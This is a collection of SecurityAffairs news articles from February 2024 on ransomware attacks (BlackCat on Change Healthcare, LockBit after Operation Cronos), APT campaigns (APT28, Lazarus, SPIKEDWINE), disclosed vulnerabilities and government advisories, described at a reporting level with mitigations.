A BlackCat ransomware attack hit UnitedHealth Group subsidiary Optum causing an outage impacting the Change Healthcare payment exchange platform.

A ransomware attack hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.

“On February 21, 2024, UnitedHealth Group (the “Company”) identified a suspected nation-state associated cyber security threat actor had gained access to some of the Change Healthcare information technology systems. Immediately upon detection of this outside threat, the Company proactively isolated the impacted systems from other connecting systems in the interest of protecting our partners and patients, to contain, assess and remediate the incident.” reads the SEC filing. “The Company is working diligently to restore those systems and resume normal operations as soon as possible, but cannot estimate the duration or extent of the disruption at this time. The Company has retained leading security experts, is working with law enforcement and notified customers, clients and certain government agencies.”

Reuters, citing sources familiar with the investigation, linked the attack to the BlackCat ransomware group. In a SEC filing, UnitedHealth Group attributed the attack to a suspected nation-state actor.

“Hackers working for the ‘Blackcat’ ransomware gang are behind the outage at UnitedHealth’s technology unit that has snarled prescription deliveries for six days, two people familiar with the matter told Reuters on Monday.” reads the Reuters. “The problems began last week after hackers gained access to Change Healthcare’s information technology systems and has led to disruptions at pharmacies across the United States.”

In response to the attack, the company was forced to shut down its systems causing an outage impacting multiple services of U.S. healthcare organizations.

In the last update provided by Change Healthcare, the company confirmed that it is experiencing a cybersecurity issue and is working to address the problem. In response to the security breach, the company disconnected Change Healthcare’s systems to contain the threat. This action was taken so our customers and partners do not need to. The company believes that Optum, UnitedHealthcare and UnitedHealth Group systems have not been affected by this issue. The company is investigating into the incident with the help of cybersecurity firm Mandiant

“We are working on multiple approaches to restore the impacted environment and will not take any shortcuts or take any additional risk as we bring our systems back online.” reads the update published by Change Healthcare. “We will continue to be proactive and aggressive with all our systems and if we suspect any issue with the system, we will immediately take action and disconnect. The disruption is expected to last at least through the day. We will provide updates as more information becomes available.”

BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.

The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.  

In February 2024, the U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward aims to target affiliated and initial access brokers involved and that facilitated the attacks of the group.

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Optum Solutions)

A new malware campaign is targeting a Ukraine entity in Finland with Remcos RAT distributed via a loader called IDAT Loader.

Morphisec Threat Labs researchers observed a new malware campaign targeting a Ukraine entity in Finland with Remcos RAT distributed via a loader called IDAT Loader.

The Computer Emergency Response Team of Ukraine (CERT-UA) linked the attacks to a threat actor tracked as UAC-0184.

The attackers employed steganography as a technique to hide a malicious payload in an image evading signature-based detection.

Remcos is a commercial remote access trojan (RAT) that can allow operators to take over the infected systems. 

Researchers from cybersecurity firm Uptcycs observed a Remcos RAT campaign using phishing emails claiming to be from an Israel Defense Forces consultant.

IDAT stands out as a sophisticated loader that can be used to deploy multiple malware families, including Danabot, SystemBC, and RedLine Stealer. The modular architecture of the IDAT loader allows it to easily add new features. The loader already supports code injection and execution modules, distinguishing it from conventional loaders.

The malware implements multiple evasion techniques, including dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and syscalls. The IDAT loader relies on a multi-stage infection chain.

“The initial stage downloads or loads the second stage, housing a module table and the primary instrumentation shellcode. The second stage injects this shellcode into a legitimate DLL or a new process. Subsequently, the main instrumentation shellcode decrypts and executes the final payload, adapting its injection or execution based on file type and configuration flags.” reads the analysis published by Morphisec. “Interestingly, in this case the IDAT modules were embedded within the primary executable, which is commonly downloaded from a remote server.” 

The sample of IDAT loader that was analyzed by the researchers borrows the code from the loader family dubbed Hijack Loader.

The researchers noticed that threat actors behind IDAT Loader used a distinctive array of Tactics, Techniques, and Procedures (TTPs) to avoid explicit connections to prior campaigns.   

The researchers shared Indicators of Compromise (IOCs) for this threat, however an extensive list of IOCs can be found in the CERT-UA bulletin. 

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cyberattack)

Researchers warn of an XSS vulnerability, tracked as CVE-2023-40000, in the LiteSpeed Cache plugin for WordPress

Patchstack researchers warn of an unauthenticated site-wide stored XSS vulnerability, tracked as CVE-2023-40000, that impacts the LiteSpeed Cache plugin for WordPress.

The plugin LiteSpeed Cache (free version) is a popular caching plugin in WordPress which has over 4 million active installations.

An unauthenticated user can exploit the vulnerability to steal sensitive information or escalate privileges on the WordPress site by performing a single HTTP request.

“This plugin suffers from unauthenticated site-wide stored XSS vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.” read the advisory published by Patchstack.

“This vulnerability occurs because the code that handles input from the user doesn’t implement sanitization and output escaping. This case also combined with improper access control on one of the available REST API endpoints from the plugin. The described vulnerability was fixed in version 5.7.0.1 and assigned CVE-2023-40000.”

The vulnerability resides in the function ‘update_cdn_status.’ 

Because the vulnerability stems from constructing an HTML value directly from the POST body parameter for the admin notice message, it is possible to fix the issue by sanitizing user input through esc_html directly on the affected parameter. Furthermore, the vendor has implemented a permission check on the update_cdn_status function, incorporating hash validation to restrict access to the function exclusively to privileged users.

The vulnerability was solved with the release of version 5.7.0.1 in October 2023.

“We recommend applying escaping and sanitization to any message that will be displayed as an admin notice. Depending on the context of the data, we recommend using sanitize_text_field to sanitize value for HTML output (outside of HTML attribute) or esc_html. For escaping values inside of attributes, you can use the esc_attr function. We also recommend applying a proper permission or authorization check to the registered rest route endpoints.” concludes the post.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, LiteSpeed Cache plugin)

New threat actors have started exploiting ConnectWise ScreenConnect vulnerabilities, including the Black Basta and Bl00dy ransomware gangs.

Multiple threat actors have started exploiting the recently disclosed vulnerabilities, tracked as CVE-2024-1709 (CVSS score of 10) and CVE-2024-1708 (CVSS score of 8.4), in the ConnectWise ScreenConnect software.

ConnectWise recently warned of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:

• CVE-2024-1709 – CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
• CVE-2024-1708 – CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”)  (CVSS score 8.4)

Both vulnerabilities were reported on February 13, 2024, through the company vulnerability disclosure channel via the ConnectWise Trust Center. The company is not aware of attacks in the wild exploiting these vulnerabilities, however, due to the higher risk of being targeted by exploits, ConnectWise recommends installing updates as emergency changes within days.  

The issues affect ScreenConnect 23.9.7 and prior, below is the remediation provided in the advisory:

Two days after the vendor addressed the two vulnerabilities, it also updated its advisory to confirm the ongoing exploitation of both issues.

Trend Micro researchers observed multiple threat actor groups that are exploiting vulnerabilities in ConnectWise ScreenConnect for different purposes, including ransomware deployment, and data exfiltration attacks.

Trend Micro confirmed that Black Basta and Bl00dy ransomware groups are actively exploiting both flaws and shared details about their attack chains.

Black Basta operators exploit the flaws to gain initial foothold on the vulnerable server, then they perform reconnaissance, discovery, and privilege escalation activities.

The gang was observed deploying the popular post-exploitation tool Cobalt Strike.

The attackers were observed searching for members of the ‘domain admin’ group to identify potential high-value targets for further attacks. Then the attackers also added new accounts to the local administrators group and deployed scripts to identify machines that connected to the Active Directory environment within the past 90 days. The attackers attempt to target these machines in further attacks or use them for lateral movement within the target network.

The Bl00dy ransomware group was also observed exploiting the two flaws in campaigns to deploy leaked builders from Conti and LockBit. The ransom notes deployed in the attacks allowed the researchers to link the attacks to the Bl00dy group.

The researchers also observed attacks where threat actors exploited these vulnerabilities in ScreenConnect via the XWorm malware. XWorm is a versatile malware that not only grants threat actors remote access capabilities, but also allows attackers to propagate through networks, exfiltrate sensitive data, and download additional payloads.

After establishing a presence on the susceptible ConnectWise server, we observed threat actors trying to execute PowerShell commands to download and run the XWORM malware.

Trend Micro also spotted threat actors deploying other remote access software, such as Atera and Syncro.

“Following our detailed examination of various threat actors exploiting vulnerabilities in ConnectWise ScreenConnect, we emphasize the urgency of updating to the latest version of the software.” Trend Micro concludes. “Immediate patching is not just advisable; it is a critical security requirement to protect your systems from these identified threats.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ConnectWise ScreenConnect)

Russian cyberspies are compromising Ubiquiti EdgeRouters to evade detection, warns a joint advisory published by authorities.

The Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners released a joint Cybersecurity Advisory (CSA) to warn that Russia-linked threat actors are using compromised Ubiquiti EdgeRouters (EdgeRouters) to evade detection in cyber operations worldwide.

The US agencies and international partners (peers from Belgium, Brazil, France, Germany, Latvia, Lithuania, Norway, Poland, South Korea, and the United Kingdom) observed multiple Russia-linked threat actors (the Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS), also known as APT28, Fancy Bear, and Forest Blizzard (Strontium)) using a botnet of compromised EdgeRouters devices, named Moobot, worldwide to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools.

“As early as 2022, APT28 actors had utilized compromised EdgeRouters to facilitate covert cyber operations against governments, militaries, and organizations around the world.” reads the joint report. “These operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation. Targeted countries include Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US[1][2]. Additionally, the actors have strategically targeted many individuals in Ukraine.”

In February 2024, a court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The Russian state-sponsored hackers used the botnet to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers, it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021, in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products. Since September 2022, Moobot botnet was spotted targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.

Researchers observed the MooBot botnet targeting routers with default or weak credentials to deploy OpenSSH trojans. Attackers replaced binaries on compromised EdgeRouters with trojanized OpenSSH server binaries allowing remote attackers to bypass authentication.

APT28 group deployed Python scripts on compromised EdgeRouters to collect and validate stolen webmail account credentials. The webmail account credentials were collected via cross-site scripting and browser-in-the-browser spear-phishing campaigns.

APT28 was also observed exploiting the critical privilege escalation vulnerability CVE-2023-23397 (CVSS score: 9.8) in Microsoft Outlook, which could allow an attacker to steal NT LAN Manager (NTLM) hashes and mount a relay attack without requiring any user interaction.

“Additionally, an FBI investigation revealed that as early as 2022, APT28 actors had exploited CVE2023-23397, a zero-day vulnerability at the time, to collect NTLMv2 digests from targeted Outlook accounts [T1203]. Per a Microsoft blog post[3] published in March 2023, CVE-2023-23397 is a critical elevation of privilege vulnerability in Microsoft Outlook on Windows wherein Net-NTLMv2 hashes are leaked to actor-controlled infrastructure [T1119, T1020].” continues the report.

In December 2023, the Russia-linked APT28 developed a compact Python backdoor dubbed MASEPIE that allows operators to execute arbitrary commands on compromised machines. APT28 had utilized compromised Ubiquiti EdgeRouters as a command-and-control infrastructure for MASEPIE backdoors. Communication to and from the EdgeRouters involved encryption using a randomly generated 16-character AES key. It’s essential to emphasize that APT28 doesn’t install MASEPIE directly on EdgeRouters but instead deploys it on systems associated with the targeted individuals and organizations.

“In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns.” concludes the report.

Below are some of the mitigations provided by the report, the government experts pointed out that rebooting a compromised EdgeRouter will not remove the malware:

• Perform a hardware factory reset to flush file systems of malicious files.
• Upgrade to the latest firmware version.
• Change any default usernames and passwords.
• Implement strategic firewall rules on WAN-side interfaces to prevent the unwanted exposure of remote management services.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Ubiquiti EdgeRouters)

The FBI, CISA, and the Department of HHS warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks.

A cybersecurity alert published by the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted attacks conducted by ALPHV/Blackcat ransomware attacks.

The US agencies released a report containing IOCs and TTPs associated with the ALPHV Blackcat RaaS operation identified through law enforcement investigations conducted as recently as February 2024.

The advisory updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released on April 19, 2022 and on December 19, 2023.

This alert aims at organizations in the healthcare sector because ALPHV Blackcat affiliates have been observed primarily targeting this sector.

“From mid-December 2023 onward, the healthcare sector has emerged as the most frequently targeted among the approximately 70 disclosed victims.” reads the joint advisory. “This trend is believed to be a response to the encouragement from ALPHV Blackcat administrators, who urged affiliates to focus their efforts on hospitals following operational actions against the group and its infrastructure in early December 2023.”

Government experts believe that the increase in targeted attacks against the healthcare sector is the response of the group to law enforcement actions against the Blackcat group in early December 2023.

FBI, CISA, and HHS urge critical infrastructure organizations to implement the suggestions outlined in the Mitigations section of the report.

In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which supports additional features and implements improved defense evasion capabilities. The new encryptor allows to target both Windows and Linux devices, as well as VMWare instances.

The report includes Indicators of Compromise (IoCs) along with mitigation and incident response guidances.

Recently, the U.S. Department of State announced a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward aims to target affiliated and initial access brokers involved and that facilitated the attacks of the group.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.  

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

In a recent ALPHV/Blackcat ransomware attack, the group hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

Analyzing the Email Security Landscape and exploring Emerging Threats and Trends.

In the ever-shifting digital arena, staying ahead of evolving threat trends is paramount for organizations aiming to safeguard their assets. Amidst this dynamic landscape, email stands as a primary battleground for cyber defense. VIPRE Security Group’s latest report, “Email Security in 2024: An Expert Insight into Email Threats,” delves into the cutting-edge tactics and technologies embraced by cybercriminals this year.

Drawing from an analysis of nearly a billion malicious emails, the report sheds light on advanced threats, empowering organizations to grasp the intricacies of email-based attacks. Below, we unveil some of the key revelations unearthed in this comprehensive study.

Key Findings from the “Email Security in 2024” Report

In an exhaustive review, VIPRE processed 7.2 billion emails globally, identifying approximately 950.39 million as malicious.

Protection Achievements

The VIPRE Email Security Link Isolation feature, akin to URL sandboxing, showcased its efficacy by securing over 41.9 million links clicked by users.

Detection Breakdown

• There was a near-even split in detection methods, with 52% caught due to content and 48% via malicious links.
• Many of the detections were due to malicious attachments and previously unseen threats, showcasing the importance of using innovative security measures

YARA Rules Impact

YARA rules were pivotal in detecting millions of malicious attempts spotlighting statistical patterns and malware family indicators. The adaptability of these rules contributed to a marked increase in malware detection, particularly in the fourth quarter, emphasizing the necessity of continuous evolution in email security tactics.

Emerging Threats and Trends

The landscape of email threats continues to evolve, with VIPRE’s report shedding light on several alarming trends:

• Deepfake and AI Exploitation: Attackers increasingly leverage deepfake technology and AI to craft more convincing phishing emails, significantly raising the stakes for email security.
• Rise of Quishing: A notable surge in phishing attacks utilizing QR codes, or “quishing,” poses new challenges, with attackers exploiting this method for its novelty and user trust.
• Targeted Sector Vulnerabilities: Financial Services, IT, Healthcare, Education, and Government sectors have emerged as primary targets, with attackers fine-tuning their strategies to exploit specific vulnerabilities within these industries.
• Mobile Threats: The expansion of mobile threats highlights the growing need for security awareness among mobile users, particularly as attackers develop more sophisticated methods to compromise personal and corporate data.

Phishing: The Persistent Threat

Phishing remains a dominant tactic in the cybercriminal arsenal, with the email report providing crucial insights:

Techniques Evolve: The majority of phishing attempts (71%) rely on deceptive links, but attachments (22%) and predatory QR codes (7%) are rising phishing tactics to watch out for.

Who’s Being Spoofed?: Microsoft tops the list of spoofed entities, highlighting the importance of vigilance against seemingly reputable sources.

Link and Attachment Tactics

• A shift in phishing methodologies is observed, with a decline in link-based phishing but a slight increase in attachment-based tactics.
• HTML and PDF attachments emerge as common vectors, underscoring the need for enhanced scrutiny of email attachments.

These insights emphasize the critical importance of remaining alert and adopting comprehensive security measures to mitigate the risks posed by the evolving landscape of phishing threats.

Spotlight on Specific Threats

The Email Security in 2024 report illuminates several specific threats that have been particularly prominent or are on the rise:

Google Group Fake Order Scams

Cybercriminals are exploiting Google Groups to distribute fake order confirmations, tricking recipients into providing personal information under the guise of canceling a non-existent order. This scam cleverly manipulates trust and the routine nature of order confirmations to breach personal security.

Seasonal Scam Emails

The report highlights an uptick in scam emails tied to holidays, leveraging the seasonal hustle to bait users into phishing traps. These scams often use newly registered domains to evade detection, exploiting users’ lowered guard during festive periods.

.EML File Attachments

A significant rise in the use of .eml file attachments for phishing attacks has been noted. These attachments, which can easily bypass traditional security measures due to their rarity in business communication, contain malicious content that, when opened, can compromise the recipient’s security.

Malware Distribution Trends

The malware landscape has shifted, with families like AsyncRAT, Qbot, RedLine, and AgentTesla taking the lead in various quarters. These malware types, particularly targeting Windows systems, highlight the need for vigilance against attachments and links that may harbor such threats.

These highlighted threats underscore the adaptability of attackers and the critical need for advanced, proactive security measures to protect against these sophisticated tactics.

Predictions for 2024

Looking to the horizon of 2024, the Email Security in 2024 Report outlines several key predictions that underscore the evolving nature of email threats:

• Quishing’s Continued Rise: The proliferation of QR codes in phishing (quishing) is expected to escalate, taking advantage of the QR code’s growing popularity and inherent trust among users.
• AI’s Double-Edged Sword: The advancement in AI technologies will be a boon for cybercriminals, enhancing the sophistication of attacks. Expect AI to be used in creating highly convincing spam emails, including deepfakes and personalized phishing attempts, making it increasingly difficult to distinguish between legitimate and malicious communications.
• The Growing Threat of Identity Theft: As attackers become more adept at infiltrating inboxes, AI and machine learning to mimic communication styles pose a significant risk for identity theft and sensitive data exfiltration.
• Escalation in Cyber Warfare: State-sponsored attacks are anticipated to intensify, with email being a critical vector for targeting critical infrastructure and spreading misinformation.
• Diversification in Malware Delivery: A broader array of file types, including .eml, .pdf, and .ppt, will be exploited to disseminate phishing and malware, challenging traditional security defenses.

These predictions highlight the need for continuous innovation in email security solutions and practices to counteract these advancing threats, ensuring that businesses and individuals can safeguard their digital communications against the next wave of cyber attacks.

About the Author: Stefanie Shank. Having spent her career in various capacities and industries under the “high tech” umbrella, Stefanie is passionate about the trends, challenges, solutions, and stories of existing and emerging technologies. A storyteller at heart, she considers herself one of the lucky ones: someone who gets to make a living doing what she loves. Stefanie is a regular writer at Bora.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Email Security)

Pharmaceutical giant Cencora suffered a cyber attack and threat actors stole data from its infrastructure.

Pharmaceutical giant Cencora disclosed a data breach after it was the victim of a cyberattack.

Cencora, Inc., formerly known as AmerisourceBergen, is an American drug wholesale company and a contract research organization that was formed by the merger of Bergen Brunswig and AmeriSource in 2001. The Company had $238.6 billion in revenue for fiscal year 2022 and had approximately 44,000 employees.

The company discovered the security breach on February 21 and immediately launched an investigation into the incident.

“On February 21, 2024, Cencora, Inc. (the “Company”), learned that data from its information systems had been exfiltrated, some of which may contain personal information. Upon initial detection of the unauthorized activity, the Company immediately took containment steps and commenced an investigation with the assistance of law enforcement, cybersecurity experts and external counsel.” Form 8-K filing with the Securities and Exchange Commission (SEC). “As of the date of this filing, the incident has not had a material impact on the Company’s operations, and its information systems continue to be operational. The Company has not yet determined whether the incident is reasonably likely to materially impact the Company’s financial condition or results of operations.”

In the Form 8-K filing with the SEC, Cencora said that the cyberattack had no material impact on the Company’s operations.

The company did not provide details about the attack, it’s unclear if Cencora was hit by a ransomware attack.

Organizations in the healthcare sector are at risk of cyberattacks, a cybersecurity alert published by the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted attacks conducted by ALPHV/Blackcat ransomware attacks.

In a recent ALPHV/Blackcat ransomware attack, the group hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, healthcare sector)

North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems.

Avast researchers observed North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. 

The zero-day, tracked as CVE-2024-21338 has been addressed by Microsoft in the February Patch Tuesday update.

The nation-state actors exploited the zero-day to gain kernel-level access and disable security software. In past attacks threat actors achieved the same goal by using much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. 

Lazarus exploited the vulnerability CVE-2024-21338 to perform direct kernel object manipulation in an updated version of their FudModule rootkit.

“the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.” reads the analysis published by Avast.

“Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find.” 

The new version of the rootkit can suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. 

The flaw CVE-2024-21338 resides within the IOCTL (Input and Output Control) dispatcher of the driver appid.sys. This driver is a core component of the AppLocker application, which is used to control which apps and files users can run. 

Lazarus exploited the zero-day in the appid.sys driver by manipulating the Input and Output Control (IOCTL) dispatcher. This manipulation allows them to arbitrary code on the target system, bypassing security measures.

“The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s PreviousMode. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the Nt(Read|Write)VirtualMemory syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It’s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.” reads the report.

With their valuable admin-to-kernel zero-day exposed, Lazarus’s ability to bypass security has been significantly hampered. They must now choose between finding a new critical exploit or reverting to their older, less potent BYOVD tactics

The researchers noticed that with their valuable admin-to-kernel zero-day exposed, Lazarus’s ability to bypass security has been significantly hampered. They must now choose between finding a new critical exploit or reverting to their older, less potent BYOVD tactics.

Researchers published Indicators of Compromise (IoCs) and YARA for the latest version of the FudModule rootkit.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – ransomware, Lazarus) 

Experts warn that the LockBit ransomware group has started using updated encryptors in new attacks, after the recent law enforcement operation.

The LockBit ransomware group appears to have fully recovered its operations following the recent law enforcement initiative, code-named Operation Cronos, which aimed to disrupt its activities.

Researchers from Zscaler first observed the ransomware group using new ransom notes referencing the new Tor infrastructure.

ThreatLabz has observed new #Lockbit ransomware attacks following the law enforcement takedown operation last week.

The latest ransom note can be found in our GitHub repo: https://t.co/rZdficpiRJ pic.twitter.com/hEIqJWrEGI

— Zscaler ThreatLabz (@Threatlabz) February 27, 2024

Researchers from BleepingComputer confirmed the Zscaler’s discovery, they found samples of the encryptors uploaded to VirusTotal [1], [2].

Last week, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.

The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.

The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.

The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.

The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.

Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.

The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.

Now the LockBit gang is attempting to relaunch its RaaS operation, the group has set up a new infrastructure and is threatening to carry out cyber attacks on the government sector.

“Very simple, that I need to attack the .gov sector more often and more, it is after such attacks that the FBI will be forced to show me weaknesses and vulnerabilities and make me stronger. By attacking the .gov sector you can know exactly if the FBI has the ability to attack us or not.” wrote the gang.

In a few days, the gang added tens of entries to its website, but only a few of them are new victims of the group. It seems that the group is re-populating its tor leak site.

The new leak site also includes an entry for the FBI that contains a long message to the law enforcement agency. According to the message, the FBI hacked the gang’s infrastructure because they didn’t want to leak information Fulton County. The ransomware gang claimed to have stolen documents containing a lot of interesting things and Donald Trump’s court cases that could affect the upcoming US election.

However, some experts do not believe that the LockBit group has truly resumed its operations and consider that the law enforcement operation has put an end to the group’s activities, at least as we knew them.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Lockbit)

A new threat actor, tracked as dubbed SPIKEDWINE, has been observed targeting officials in Europe with a previously undetected backdoor WINELOADER.

Zscaler researchers warn that a previously unknown threat actor dubbed SPIKEDWINE has been observed targeting European officials. The cyberspies used a bait PDF document masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024.

The campaign is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed by the threat actors.

The PDF included a link to a fake questionnaire that redirects users to a mailcious ZIP archive hosted on a compromised site.

The ZIP archive contains an HTA file named wine.hta that contains obfuscated JavaScript code. The script executes the next stage and it uses an obfuscation technique that matches those of the publicly available obfuscator obfuscator.io.

The JavaScript code retrieves an encoded ZIP archive containing WINELOADER from the same domain.

Threat actors rely on DLL hollowing to inject WINELOADER into a randomly selected DLL from the Windows system directory. 

The researchers pointed out that WINELOADER is not injected into the DLLs that contain exported functions used by the malware.

